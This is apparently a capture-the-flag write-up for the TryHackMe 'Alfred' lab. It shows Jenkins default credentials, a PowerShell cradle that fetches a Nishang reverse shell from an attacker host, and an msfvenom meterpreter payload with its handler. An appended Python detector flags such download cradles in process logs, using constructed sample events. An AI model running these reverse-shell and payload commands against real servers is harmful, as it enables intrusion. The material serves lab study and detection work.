THM - Alfred

Nmap

nmap -p- -A 10.10.75.158 -oN alfred.nmap

Jenkins

  • http://10.10.75.158:8080
  • admin:admin

Get initial access

Get payload

  • https://github.com/samratashok/nishang

Reverse shell

On hacker machine

listener

nc -nvlp 4443

static web server

python3 -m http.server

On target machine

powershell iex (New-Object Net.WebClient).DownloadString('http://10.18.9.175:8000/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.18.9.175 -Port 4443
  • Add this command as the Command in the Jenkins project configuration

Switching Shells

On hacker machine

msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.18.9.175 LPORT=4442 -f exe -o msf_shell.exe

On target machine

powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.18.9.175:8000/msf_shell.exe','msf_shell.exe')"

On hacker machine

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.18.9.175
set LPORT 4442
run

On target machine

Start-Process "msf_shell.exe"
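
Detection side, as an added example that is not part of the original notes: both downloads above use Net.WebClient from a PowerShell process started by a Jenkins build step, which is visible in process-creation logs. The event field names, the sample events and the Jenkins parent pattern below are constructed assumptions, not data from this box.

```python
import re

# Both download styles used in this writeup: WebClient.DownloadString / DownloadFile.
CRADLE = re.compile(r"net\.webclient\W.*?\.download(string|file)\s*\(", re.I)
IEX = re.compile(r"\b(iex|invoke-expression)\b", re.I)
URL = re.compile(r"https?://[^\s'\")]+", re.I)
# Assumption: a Jenkins build step runs under a parent whose image or command
# line mentions Jenkins or its Java runtime.
CI_PARENT = re.compile(r"jenkins|javaw?\.exe", re.I)

def classify(event):
    """Return a finding dict for a PowerShell download cradle, else None."""
    if "powershell" not in event["Image"].lower():
        return None
    cmd = event["CommandLine"]
    hit = CRADLE.search(cmd)
    if hit is None:
        return None
    if hit.group(1).lower() == "file":
        kind = "file-drop"    # binary written to disk
    elif IEX.search(cmd):
        kind = "in-memory"    # script fetched and executed without a file
    else:
        kind = "download"     # content fetched, no execution seen in this command
    url = URL.search(cmd)
    parent = event["ParentImage"] + " " + event["ParentCommandLine"]
    return {"kind": kind, "url": url.group(0) if url else None,
            "ci_parent": bool(CI_PARENT.search(parent))}

def scan(events):
    """Classify every event and keep only the findings."""
    return [f for f in map(classify, events) if f]

# Constructed sample events (not captured from a real host).
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
JENKINS = {"Image": PS, "ParentImage": r"C:\Windows\System32\cmd.exe",
           "ParentCommandLine": r"cmd /c call C:\Windows\TEMP\jenkins4821.bat"}
USER = {"Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
        "ParentCommandLine": r"C:\Windows\explorer.exe"}
SAMPLE = [
    {**JENKINS, "CommandLine": "powershell iex (New-Object Net.WebClient).DownloadString('http://192.0.2.10:8000/script.ps1')"},
    {**JENKINS, "CommandLine": "powershell (New-Object System.Net.WebClient).Downloadfile('http://192.0.2.10:8000/tool.exe','tool.exe')"},
    {**JENKINS, "CommandLine": r"powershell -File C:\build\package.ps1"},
    {**USER, "CommandLine": "powershell $s=(New-Object Net.WebClient).DownloadString('http://192.0.2.20/a.txt')"},
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

A finding with ci_parent set means a build job fetched remote content, which on a Jenkins host reachable with admin:admin is worth alerting on by itself.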